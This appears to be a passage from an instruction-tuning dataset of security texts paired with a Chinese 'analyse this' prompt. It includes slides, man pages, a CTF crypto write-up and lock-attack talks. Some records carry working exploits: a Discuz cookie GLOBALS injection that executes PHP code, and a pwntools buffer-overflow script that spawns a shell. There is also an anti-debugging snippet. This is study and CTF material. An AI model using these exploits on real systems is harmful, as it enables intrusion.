LLVM and IOODetector Case study Related Work and Discussion Fuzzers and Sanitizers Fuzzing is proved to be an effective way to find memory corruption bugs. A general workflow of a fuzzer Seed selector Mutator/ Generator Target Program Monitor/ Filter Init seed corpus Report crash Discarded boring test cases Interesting testcases Real Vulnerabilities Fuzzers Crash is a necessary signal for identifying a vulnerability in general purpose fuzzers Seed selector Mutator/ Generator Target Program Monitor / Filter Init seed corpus Report crash Discarded boring test cases Interesting testcases Real Vulnerabilities Crash handlers in popular fuzzers Crash handler in AFL Crash handler in honggFuzz Crash handler in libFuzzer Memory debugging tools (Sanitizers Address Sanitizer Use after free Heap Buffer overflow Stack Buffer overflow Global buffer overflow Use after return Use after scope Initialization order bugs  Leak Sanitizer Memory leaks  Memory Sanitizer  use of uninitialized memory  Thread Sanitizer  Data races and dead locks  Undefined Behavior Sanitizer   Address Sanitizer Founded Bugs Sanitizers help fuzzers find more bugs b", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKeren Elazari aka @K3r3n3 www.K3r3n3.com A Confession TAKE THE RED PILL? @K3r3n3 @K3r3n3 Source : 25 Years Of Vulnerabilities: 1988-2012 Sourcefire Research Report Barnaby Jack, 1977-2013 Photo: IOACTIVE RESEARCH What Matters! https://www.iamthecavalry.org/ Dont Keep Your Bugs To Yourself www.bugcrowd.com/list-of-bug-bounty-programs The Internet Bug Bounty www.hackerone.com/ibb AFFORD NOT TO Botnet Phishing Campaigns Spam Denial of Service Image by Chris Halderman CC BY 3.0 Empower The Masses Image by Scoobay CC BY-NC-SA 2.0 One Million Security Professionals Needed! Source : Cisco 2014 Annual Security Report Image by Scoobay CC BY-NC-SA 2.0 Image by R. Kikuo Johnson for NYT, September 2013 FEAR UNCERTAINTY DOUBT Image: The Economist Fight FUD With FACTS INFLUENCE THE INPUT RIGHT NOW Research What Matters Dont Keep Your Bugs To Yourself Collaborate & Share Empower The Masses Stop The Spread Of FUD Illustration by François Baranger", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKeren Elazari aka @K3r3n3 www.K3r3n3.com @K3r3n3 TAKE THE RED PILL? Source : 25 Years Of Vulnerabilities: 1988-2012 Sourcefire Research Report Solution: Secure What Matters! Life Rights CritInfr IP PII CCN Counter- measures Situational Awareness Operational Excellence Defensible Infrastructure REPLACEABILITY Original Model by Joshua Corman https://www.iamthecavalry.org/ Solution: Dont Keep Your Bugs To Yourself https://bugcrowd.com/list-of-bug-bounty-programs The Internet Bug Bounty https://hackerone.com/ibb Solution: Stop, Collaborate and Share Image by Chris Halderman CC BY 3.0 Solution : Empower The Masses Image by Scoobay CC BY-NC-SA 2.0 Image: Crobis, The Economist Solution: Mind The Gap Secure What Matters Dont Keep Your Bugs To Yourself Collaborate & Share Empower The Masses Stop The Spread Of FUD Bonus Points: One Million Security Professionals Needed! Source : Cisco 2014 Annual Security Report", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 流密码 流密码一般逐字节或者逐比特处理信息一般来说 - 流密码的密钥长度会与明文的长度相同 - 流密码的密钥派生自一个较短的密钥派生算法通常为一个伪随机数生成算法 需要注意的是流加密目前来说都是对称加密 伪随机数生成算法生成的序列的随机性越强明文中的统计特征被覆盖的更好 流密码加解密非常简单在已知明文的情况下可以非常容易地获取密钥流 流密码的关键在于设计好的伪随机数生成器一般来说伪随机数生成器的基本构造模块为反馈移位寄存器当然也有一些特殊设计的流密码比如 RC4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Man page contributed by Dirk Eddelbuettel <edd@debian.org> .\\\" and released under the GNU GPL .TH OCTAVE-CONFIG 1 \"19 February 2003\" \"GNU Octave\" .SH NAME octave-config - 检索 GNU Octave 组件和库信息 .SH \"SYNOPSIS 总览\" .B octave-config .B [--m-site-dir] .B [--oct-site-dir] .B [-v|--version] .B [-h|-?|--help] .SH \"DESCRIPTION 描述\" .PP \\fIoctave-config\\fP 是用于为 .BR octave (1) 获取 .oct 和 .m 文件的目录信息的工具 .SH \"OPTIONS 选项\" \\fIoctave-config\\fP 接受下列选项 .TP 8 .B \\--m-site-dir 显示本地的或 site-specific 的.m 脚本文件所在的主目录 .TP 8 .B \\--oct-site-dir 显示本地的或 site-specific 的.oct 动态链接库所在的主目录 .TP 8 .B \\-v|\\-\\-version 显示 .BR octave (1) 的版本信息 .TP 8 .B \\-h|-?|--help 显示 \\fIoctave-config\\fP 的帮助页面 .SH AUTHOR John W. Eaton <jwe@bevo.che.wisc.edu> This manual page was contributed by Dirk Eddelbuettel <edd@debian.org> for the Debian GNU/Linux distribution but may be used by others.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Overview What is Razorback? 3 Razorback Is  An Open Source framework (GPLv2) to enable advanced processing of data and detection of events  Able to get data as it traverses the network  Able to get data after its received by a server  Able to perform advanced event correlation  Our answer to an evolving threat landscape 4 The Challenge is Different  Attacks have switched from server attacks to client attacks  Common attack vectors are easily obfuscated  Scripting languages are infinitely variable  Compression obscures attack signatures  And more!  File formats are made by insane people  Back-channel systems are increasingly difficult to detect 5 The Problem With Real-Time  Inline systems must emulate the processing of thousands of desktops  Detection of many backchannels is most successful with statistical evaluation of network traffic  Deep file inspection requires too much time to process! 6 Fill the Gap  A system is needed that can handle varied detection needs  A system is needed that extensible, open and scalable  A system is needed that facilitates incident response, not just triggers it Architecture What makes it tick? 8 Framework Goals  Provide entry for any arbitrary data type  Provide routing of input data to any number of relevant data processors  Provide alerting to any framework-capable system  Provide verbose, detailed logging  Make intelligent use of all data 9 Razorback is comprised of  A collection of elements working together  Each element performs a discrete task  Elements are tied together via the Dispatcher  Nugget types:  Correlation  Defense Update  Workstation  Data Collection  Data Detection/Analysis  Output  Intelligence 10 The System Dispatcher Collection Nugget Detection Nugget Detection Nugget Detection Nuggets Database Output Nugget Output Nugget Output Nuggets Collection Nugget Collection Nuggets Other Types of Nuggets 11 The Dispatcher  Handles all communication between nuggets  Handles database interactions  Database driven  APIs a", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSlide 1 Replacing TripWire with SNMPv3 Matthew G. Marsh Chief Scientist of the NEbraskaCERT Slide 2 Scope Quick Overview & History of SNMP Definitions & Terminology SNMPv3 will be implicit in the rest of the sections RFC(s) that define v3 Highlights - why use v3 Authentication Privacy Security Scope General Usage Net-SNMP PakDefConX MIB PakDefConX Source Code Usage Example Discussion Slide 3 History SNMP is defined by four features: A data definition language Management Information definition A protocol definition Security and Administration definition Standard 15 defines the protocol (SNMP) Standard 16 defines the structure of management information Standard 17 defines MIB-II All SNMP information and organization is specified using Abstract Syntax Notation One (ASN.1) (ISO Standard) SNMPv1 came into being and use in the late 1980's. By 1990 most equipment capable of speaking TCP/IP used SNMPv1 for management capabilities. Some vendors, most notably WellFleet, used SNMP as the basis for all interaction with the equipment. SNMPv1 was defined by three modes of operation Read - a mode of obtaining information from a device based on a query/response Write - a mode of setting parameters within a device based on query/response Trap - a mode for a device to send information about itself without a query These first two modes used basic single passwords as the authentication and security measures SNMPv1 was designed for and used UDP as the main transport mode Contrary to popular belief v1 did provide a framework for authentication, privacy, and authorization; however there were no actual protocol structures, designs, or implementations done within this framework. SNMPv2 came in several incarnations as it was developed. One of the primary original design goals for v2 was to structure and design authentication, privacy, and authorization. However this was not realized although much of the structure formality was completed. SNMPv2 added better data types and efficiency along wi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ZwSetInformationThread ## 关于ZwSetInformationThread ZwSetInformationThread 等同于 NtSetInformationThread通过为线程设置 ThreadHideFromDebugger可以禁止线程产生调试事件代码如下 ```c #include <Windows.h> #include <stdio.h> typedef DWORD(WINAPI* ZW_SET_INFORMATION_THREAD) (HANDLE, DWORD, PVOID, ULONG); #define ThreadHideFromDebugger 0x11 VOID DisableDebugEvent(VOID) { HINSTANCE hModule; ZW_SET_INFORMATION_THREAD ZwSetInformationThread; hModule = GetModuleHandleA(\"Ntdll\"); ZwSetInformationThread = (ZW_SET_INFORMATION_THREAD)GetProcAddress(hModule, \"ZwSetInformationThread\"); ZwSetInformationThread(GetCurrentThread(), ThreadHideFromDebugger, 0, 0); } int main() { printf(\"Begin\\n\"); DisableDebugEvent(); printf(\"End\\n\"); return 0; } ``` 关键代码为`ZwSetInformationThread(GetCurrentThread(), ThreadHideFromDebugger, 0, 0);`如果处于调试状态执行完该行代码程序就会退出 ## 如何绕过 注意到该处 ZwSetInformationThread 函数的第 2 个参数为 ThreadHideFromDebugger其值为 0x11调试执行到该函数时若发现第 2 个参数值为 0x11跳过或者将 0x11 修改为其他值即可", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (c) 1980, 1991 Regents of the University of California. .\\\" All rights reserved. .\\\" .\\\" This code is derived from software contributed to Berkeley by .\\\" the American National Standards Committee X3, on Information .\\\" Processing Systems. .\\\" .\\\" Redistribution and use in source and binary forms, with or without .\\\" modification, are permitted provided that the following conditions .\\\" are met: .\\\" 1. Redistributions of source code must retain the above copyright .\\\" notice, this list of conditions and the following disclaimer. .\\\" 2. Redistributions in binary form must reproduce the above copyright .\\\" notice, this list of conditions and the following disclaimer in the .\\\" documentation and/or other materials provided with the distribution. .\\\" 3. All advertising materials mentioning features or use of this software .\\\" must display the following acknowledgement: .\\\" This product includes software developed by the University of .\\\" California, Berkeley and its contributors. .\\\" 4. Neither the name of the University nor the names of its contributors .\\\" may be used to endorse or promote products derived from this software .\\\" without specific prior written permission. .\\\" .\\\" THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND .\\\" ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE .\\\" IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE .\\\" ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE .\\\" FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL .\\\" DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS .\\\" OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) .\\\" HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT .\\\" LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY .\\\" OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF .\\\" SUCH DAMAGE. .\\\" .\\\" @(#", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# MITM (crypto, 243p, 34 sovled) In the task we get [server code](challenge.py) and endpoint to connect to. The task is a classic Man-In-The-Middle setup between client and server, which are connecting via ECDH protocol using curve25519. Both parties have pre-shared private secret value, which they use to authenticate. We can connect to either of them and try to initiate communication, but since we don't know the secret, we will fail authentication. The most important part of the code is the handshake: ```python def Handshake(password, reader, writer): myPrivateKey = Private() myNonce = os.urandom(32) WriteBin(writer, myPrivateKey.get_public().serialize()) WriteBin(writer, myNonce) theirPublicKey = ReadBin(reader) theirNonce = ReadBin(reader) if myNonce == theirNonce: return None if theirPublicKey in (b'\\x00'*32, b'\\x01' + (b'\\x00' * 31)): return None theirPublicKey = Public(theirPublicKey) sharedKey = myPrivateKey.get_shared_key(theirPublicKey) myProof = ComputeProof(sharedKey, theirNonce + password) WriteBin(writer, myProof) theirProof = ReadBin(reader) if not VerifyProof(sharedKey, myNonce + password, theirProof): return None return sharedKey ``` Both parties send and receive: - public key - random 32 bytes nonce - hmac proof calculated from shared key, pre-shared secret and nonce We can negotiate a shared key with the other party but we can't calculate the proof since we lack the pre-shared secret. During the handshake client and server first send their nonce, and then read nonce from the other side, so we could send the same nonce they provided, and therefore our proof would be identical to their proof, so we could re-send this one too. But the code prevents this: ```python if myNonce == theirNonce: return None ``` We could forward the parameters between client and server, and it would pass authentication, but we won't know the shared secret value, so we won't be able to encrypt/decrypt communication. If we could negotiate a shared secret with both sides, but s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKey Decoding and Duplication Attacks for the Schlage Primus High-Security Lock David Lawrence Robert Johnson Gabriel Karpman locks@mit.edu DEF CON 21 August 3, 2013 dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 1 / 30 Standard pin-tumbler locks Photo credit: user pbroks13 on Wikimedia Commons. Licensed under GFDL or CC-BY-SA-3.0. Vulnerabilities 1 Key duplication: get copies made in any hardware store. 2 Manipulation: susceptible to picking, impressioning, etc. dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 2 / 30 The Schlage Primus Based on a pin-tumbler lock, but with a second independent locking mechanism. Manipulation is possible but extremely difficult. Some people can pick these in under a minute. Most people cannot. We will focus on key duplication and the implications thereof. dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 3 / 30 1 Reverse-engineering the Primus 2 3D modeling Primus keys 3 Fabricating Primus keys 4 What it all means dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 4 / 30 1 Reverse-engineering the Primus 2 3D modeling Primus keys 3 Fabricating Primus keys 4 What it all means dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 5 / 30 Security through patents dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 6 / 30 Look up the patent. . . dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 7 / 30 Primus service manual w3.securitytechnologies.com/IRSTDocs/Manual/108482.pdf (and many other online sources) dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 8 / 30 Sidebar operation DO N O T DU P L I C A T E P AT .NO .4,756,177 PRIMUS Finger pins must be lifted to the correct height. Finger pins must be rotated to the correct angle. dlaw, robj, gdkar (DEF CON 21) Attacking the Schlage Primus August 3, 2013 9 / 30 Disassembly Fill in any missing deta", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVulReport sylphid@vulreport.net Agenda  弱點揭露現狀  為什麼要建置VulReport  負責任的弱點揭露 \"高超的電腦技術卻沒有用在正途 zone-h Underground Economy 關於 VulReport  由 HITCON(Hacks in Taiwan Conf.) 主要成員發起  政府企業與白帽駭客間的溝通管道及技術交流平台  藉由此平台讓政府單位或企業正視漏洞問題  增進資安相關訊息的交流 別讓駭客不開心  黑色產業 -> 資安產業/公益  技術的交流與提昇  正面形象的轉變 Google VRP - 1 Google VRP - 2 Google Project Zero - 1 Google Project Zero - 2 Alibaba 烏雲 - 1 烏雲 - 台灣 台灣是全球殭屍網路第四大國 全世界都留一手 漏洞 - 資安攻防的關鍵 關於 VulReport  由 HITCON(Hacks in Taiwan Conf.) 主要成員發起  政府企業與白帽駭客間的溝通管道及技術交流平台  藉由此平台讓政府單位或企業正視漏洞問題  增進資安相關訊息的交流 為何建置VulReport  台灣版的弱點資料庫  在地化通報及溝通讓修補時間縮短  提供NGO/無自行修復能力的小型企業修補服務或諮詢  提供學校資安社團參與資安弱點修補實務訓練  整合原本零散的安全研究人員或社群  提升台灣整體資安防禦實力 漏洞通報範例  漏洞揭露流程  弱點審核(5人天)  廠商/企業組織弱點通知與確認(5人天)  對安全合作夥伴公開 (3天)  向核心成員及相關領域專家公開(10天)  對大眾公開(30/45/65/90天) VulReport 使用規範與聲明 刑法 第三六章 妨害電腦使用罪  第 358 條 無故輸入他人帳號密碼破解使用電腦之保護措施或利用電腦系統之漏洞 而入侵他人之電腦或其相關設備者處三年以下有期徒刑拘役或科或 併科十萬元以下罰金  第 359 條 無故取得刪除或變更他人電腦或其相關設備之電磁紀錄致生損害於公 眾或他人者處五年以下有期徒刑拘役或科或併科二十萬元以下罰金  第 360 條 無故以電腦程式或其他電磁方式干擾他人電腦或其相關設備致生損害於 公眾或他人者處三年以下有期徒刑拘役或科或併科十萬元以下罰金  第 361 條 對於公務機關之電腦或其相關設備犯前三條之罪者加重其刑至二分之一   第 362 條 製作專供犯本章之罪之電腦程式而供自己或他人犯本章之罪致生損害 於公眾或他人者處五年以下有期徒刑拘役或科或併科二十萬元以下罰 金  第 363 條 第三百五十八條至第三百六十條之罪須告訴乃論 VulReport 里程碑  2014 Q1 開始籌備  2014 Q2 網站雛形(HITCON FreeTalk 短暫公開)  2014/11/24 公開測試  2014/12/23 粉絲團 500 讚(藉由社群力量宣傳及擴散)  2015/01/9 公開記者會  2015/01/10 公測/第一屆VR漏洞積分賽結束 漏洞積分排名 (2015⅛) 通報漏洞統計 (2015/1/8)  政府: 11  企業: 36  學校: 13  NGO: 5  VulReport: 5 VulReport 企業帳號  等級: 免費/正式/黃金/鑽石  優先通知漏洞通報  通報期限: 30/45/65/90  資安諮詢服務  Logo連結  資安人才招聘  漏洞資訊提供研究  資安產品或服務推薦  對外服務檢測(研議中)  詳見: http://goo.gl/9cbFgN wiki - responsible disclosure Responsible Vulnerability Disclosure Process Security Response Center 責任揭密政策 - Uber responsible disclosure policy -1 responsible disclosure policy -2 responsible disclosure policy - 3 VulReport 未來規劃  Happy Hackers  VulReport WEB: https://vulreport.net/ FB: facebook.com/vulreport", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2009 年駭客年會徵求論文 HIT 2009 Call For Paper 時間2009 年 7 月 18 日~19 日星期六星期日 主辦單位CHROOT  Security Research Group (http://www.chroot.org) TWISC  Taiwan Information Security Center (http://www.twisc.org) 活動網址http://hitcon.org 台灣第五屆駭客年會將於 2009 年 7 月 18~19 日週六日舉行歡迎各 界人士踴躍投稿論文內容以探討實作技術並能演講 50 分鐘為佳 為了讓會議主題能夠明確我們擬定了以下議題有興趣的朋友可以從下 列議題中選擇自己擅長的方面進行準備(包括論文程式碼和投影片)但不以 下列的議題為限今年特別歡迎各項有關行動裝置系統的安全技術探討 1. Exploit technique 對於網路作業系統和應用程式等各方面攻擊程式或手法的技術研究 2. Honeypot 構建安全的 Honeynet 系統對各種入侵進行詳細的技術分析瞭解攻擊 者行為和 攻擊手法等或者對於 Honeypot 進行反追蹤技術的探討 3. Virus and anti-virus 電腦病毒和防毒軟體新趨勢或研究 4. Reverse engineering 對二進位檔或者不明資料進行詳細解析構建反向工程的具體過程和方 法 5. Audit software vulnerability 對開放原始碼的軟體進行安全性檢測與分析的具體過程和方法或是對 商業軟體所 進行的安全性分析 6. Backdoor and rootkit 各種新型態的後門或木馬的設計研究或是檢查方式 7. Web and database security 各種網頁網站軟體和資料庫的安全性探討 8. Firewall, WAF, IDS and IDP 防火牆(Firewall)入侵偵測(防禦)系統(IDSIDP)等的技術現狀和發展前 景入侵 檢測系統在現階段的實際應用情況等 9. Hardened system 對各種當前各種作業系統進行安全加強提升不同安全級別方法技 術發展方向等 10. Covert Channel 隱藏傳輸通道將某特定的資料隱藏包裝於其它正常的資料串流或協定 中進行傳 送 論文可選中文或英文撰寫 每文第一頁必須包含題目作者聯絡人 演講者及聯絡資料(電話電子郵件)等並以 PDF 檔格式於 2009 年 6 月 15 日前利用電子郵件附帶傳送檔案至 hit2009@hitcon.org 為鼓勵投稿本次會議將致贈每篇被接受之論文 NT $3,000 元整 此 外大會將依作者意願將論文或演講內容以電子或書面媒體方式散佈 除了上述的論文徵求外本次駭客年會計畫了一場 0-day exploit 展示 只要在 2009 年 6 月 15 日前將您個人所發現的漏洞(未公開且尚未被修 正)以電子郵件方式傳送至 hit2009@hitcon.org經過確認就有機會免費取 得本屆駭客年會的入場券並且上台展示漏洞", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2015-8 汪涛  汪涛 of BaiduX-TeamID neobyte  多年安全评估经验涉及方向较杂web安全java安全android安 全前端安全 3 parseUri注入 PendingIntent误用 Action/Component/Data注入 Intent转换与复制 Intent注入的概念  Android提供的一种java环境下IPC的形式Intent是一种 IPC消息对象用于向APP的组件请求一次操作  发送与接收组件可能运行在同一个APP或不同的APP进程中  请求的操作可以是启动一个ActivityService或处理Broadcast  Intent中通常有Action行动或Component目标组件名系 统据此决定接收Intent的目标组件  Intent中还通常包含额外的数据ExtrasData供目标组件处 理 Action Compo Extras Data  Intent  Intent是安卓app的重要本地攻击界面APP公开 组件接收外部Intent数据处理时可能存在安全漏洞  实例  Webview JsInterface  SQL injection  Path Traversal  权限泄漏网络权限读写短信的权限 Action Compo Extras Data  Intent 目标 数据  http://oasam.org/en/oasam/oasam-dv-data-validation/oasam-dv-007- intent-injection  If users input is loaded in a dynamic manner in the Intent data, a malicious user could manipulate such data in order to execute code through it. In particular, the existence of dynamic data must be checked while including such data in an Intent, especially through the following Intent methods: addCategory(), setAction(), setClass(), setClassName(), setComponent(), setData() and setDataAndType(). App Intent startService Activity Service Receiver 外部输入  本地Intent注入的风险  本地权限提升  访问私有组件等  场景  某APP存在本地Intent注入漏洞因此注入的 Intent可以攻击其敏感的私有组件  System权限的APP若存在Intent注入漏洞可以 绕过IPC权限启动一些敏感的组件例如 launchAnyWhere, BroadcastAnyWhere  远程Intent注入的风险  等同于有限的远程命令执行  本地暴露组件的漏洞可从远程攻击  场景  来自网页中的JS可以发起intent播打电话  来自通信网络中的短信可以发起intent Intent转换与复制 n构造intent的元素来自外部 nAction注入 nComponent注入 nData注入 n泄漏pendingintent可能使其 他进程修改intent并以APP的 身份发出 n Intent.parseUri可解析String 为Intent如果未进行校验 可能被攻击者篡改Intent n完整接收intent后转发 nIntent代理 ngetParcelable() nnew Intent(intent) Action/Compo/Data注入 PendingIntent误用 parseUri注入  一个开源的java bytecode 缺陷分析工具  分析一个目录下的所有class文件  编译安卓4.4.4得到所有中间过程的class文件 这样就无需dex2jar共约3万个class 11 parseUri注入 PendingIntent误用 Action/Component/Data注入 Intent转换与复制 Intent注入的概念  最早由申迪分析AccountManager存在缺陷恶意APP可 以发出任意intent来启动activity绕过IPC权限限制  http://blogs.360.cn/360mobile/2014/08/19/launchanywhere-google-bug- 7699048/   本质上就是一个intent注入 android.accounts.Acc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Discuz 7.x/6.x 全局变量防御绕过导致代码执行 由于php5.3.x版本里php.ini的设置里`request_order`默认值为GP导致`$_REQUEST`中不再包含`$_COOKIE`我们通过在Cookie中传入`$GLOBALS`来覆盖全局变量造成代码执行漏洞 具体原理请参考 - https://www.secpulse.com/archives/2338.html ## 漏洞环境 执行如下命令启动Discuz 7.2 ``` docker compose up -d ``` 启动后访问`http://your-ip:8080/install/`来安装discuz数据库地址填写`db`数据库名为`discuz`数据库账号密码均为`root` ![](1.png) ## 漏洞复现 安装成功后直接找一个已存在的帖子向其发送数据包并在Cookie中增加`GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();` ``` GET /viewthread.php?tid=10&extra=page%3D1 HTTP/1.1 Host: your-ip:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Cookie: GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo(); Connection: close ``` 可见phpinfo已成功执行 ![](2.png) > 网上文章说需要一个带表情评论的帖子实际测试发现并不需要这块仍需阅读代码来解释原因", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nStaring into the Abyss: The Dark Side of Crime Fighting, Security, and Professional Intelligence Notes and Comments WHY SECURITY SUCKS As of 2010, Frost & Sullivan estimates that there are 2.28 million information security professionals worldwide. to which an experienced security practitioner replied: it sounds better if you make air quotes when you say information security professionals. THE SITUATION We are all in this together. all hacking and all hackers are gray hat. a black hat hacker is a hacker. a gray hat hacker is a hacker who knows when to fudge the truth. a white hat hacker is a hacker who put the truth down somewhere and cant remember where he left it. the world is gray. hacking is a subset of the world. therefore, hacking is gray. Those who define a paradigm do not need to worry about answers, because they determine the questions that can be asked. They know the size and shape of the picture because they create the frame. Years ago I referred to real birds kin digital cages. Now I would say, real flocks of birds in digital cages. The simulated beating wings above and below and on both sides provide an illusion of security, being part of the herd, the team, the tribe, and our own beating wings provide an illusion of the freedom of flight. But the cage slowly turns and positions us where it will. We are all assimilated. The Borg-R-Us. Margaret Mead , noted anthropologist, said it takes a full year to learn how to see what she learns in the first week in a new culture because she is assimilated so quickly and unconsciously into the culture. The frames of her perceptual lenses are immediately recontextualized by the cues, however exotic, in response to her statements. 2 In any organizational culture, we learn how to behave according to known but unwritten rules. The written rules, known only when we scan the thick book given to new hires, soon become written and unknown as they gather dust on the shelf in our cubicles. (there are four kinds of rules: known", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 1996 PWN ## Description: > It's 1996 all over again! ```c++ // compile with -no-pie -fno-stack-protector #include <iostream> #include <unistd.h> #include <stdlib.h> using namespace std; void spawn_shell() { char* args[] = {(char*)\"/bin/bash\", NULL}; execve(\"/bin/bash\", args, NULL); } int main() { char buf[1024]; cout << \"Which environment variable do you want to read? \"; cin >> buf; cout << buf << \"=\" << getenv(buf) << endl; } ``` A binary file was attached as well. ## Solution: It's pretty simple to notice the buffer overflow - `main` declares a buffer of 1024 bytes, but does not limit the input read into it. We just need to overflow the buffer, override the return address of `main` with the address of `spawn_shell` and we're done. The script: ```python from pwn import * import argparse import os LOCAL_PATH = \"./1996\" def get_process(is_remote = False): if is_remote: return remote(\"35.207.132.47\", 22227) else: return process(LOCAL_PATH) def send_payload(proc, payload): proc.sendlineafter(\"Which environment variable do you want to read? \", payload) def get_overflow_offset(): # It's problematic to create a core dump on an NTFS file system, # so reconfigure core dumps to be created elsewhere os.system(\"echo ~/core/core_dump > /proc/sys/kernel/core_pattern\") os.system(\"rm core.* > /dev/null\") proc = process(LOCAL_PATH) payload = cyclic(1200, n = 8) send_payload(proc, payload) proc.wait() offset = cyclic_find(proc.corefile.fault_addr, n = 8) log.info(\"Overflow offset: {}\".format(offset)) return offset parser = argparse.ArgumentParser() parser.add_argument(\"-r\", \"--remote\", help=\"Execute on remote server\", action=\"store_true\") args = parser.parse_args() e = ELF(LOCAL_PATH) context.binary = e.path log.info(\"Address of spawn_shell(): 0x{:02X}\".format(e.symbols[\"_Z11spawn_shellv\"])) offset = get_overflow_offset() p = get_process(args.remote) payload = fit({offset: p64(e.symbols[\"_Z11spawn_shellv\"])}) send_payload(p, payload) p.interactive() ``` The output: ```console root", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" 版权所有 Andries Brouwer, Ragnar Hojlond Espinosa和A Wik 1998. .\\\" 中文版版权所有 astonia,BitBIRD, www.linuxforum.net 2000 .\\\" 本文件可以在LDP GENERAL licence 1998年第一版所述条件下拷贝 .\\\" 并且该许可可同本文件一起分发 .\\\" .TH DD 1 \"November 1998\" \"GNU fileutils 4.0\" .SH NAME dd \\- 转换和拷贝文件 .SH 摘要 .B dd .B [\\-\\-help] [\\-\\-version] .BI [if= file ] .BI [of= file ] .BI [ibs= bytes ] .BI [obs= bytes ] .BI [bs= bytes ] .BI [cbs= bytes ] .BI [skip= blocks ] .BI [seek= blocks ] .BI [count= blocks ] .B \"[conv={ascii, ebcdic, ibm, block, unblock, lcase, ucase, swab, noerror, notrunc, sync}]\" .SH 描述 当进行非强制的转换的时候使用指定的输入和输出块大小拷贝文件 默认是从标准输入到标准输出 .PP 它每次从输入读取指定大小的一个块默认是512字节 如果使用 .BI bs= bytes 选项并且没有转换除了指定 .BR sync \", \" noerror \", 或 \" notrunc 之外 那么dd将把全部读到的数据可以比请求读的少 写到独立的输出块去 这个输出块的长度和读到的数据 完全一样除非指定使用 .B sync同步 转换那样的话数据结尾处将追加NUL字符或空格见下 .PP 其他情况下输入的时候每次读一个块然后处理并将 输出结果收集起来最后写到指定大小的数据块中去最 终的输出块可能会比指定的大小短一些 .PP 数字值选项以字节或块为单位后面可以跟一个乘数 k=1024b=512w=2c=1w和c是GNU扩展语法最好别 使用w因为在system V中它表示2在4.2 BSD中它 表示4两个或更多的数值表达式可以通过\\(lqx\\(rq乘起来 GEU fileutils 4.0并且允许在数据块大小的叙述中使用 下列乘法后缀用bs=cbs=obs=M=1048576G=1073741824 同理可得TPEZYD后缀表示数值是以 十进制表示的kD=1000 MD=1000000 GD=1000000000等等 注意在lsdfdu命令中M等标记的大小是由环境 变量确定的而在DD中它的值是固定的 .SH 选项 .TP .BI \"if=\" file 从 .I file 中读而不是标准输入 .TP .BI \"of=\" file 写到 .I file 里去而不是标准输出除非指定 .B conv=notrunc 否则 .B dd 将把 .I file 截为O字节或由 .BR seek= 选项指定的大小 .TP .BI \"ibs=\" bytes 一次读 .I bytes 字节默认是512 .TP .BI \"obs=\" 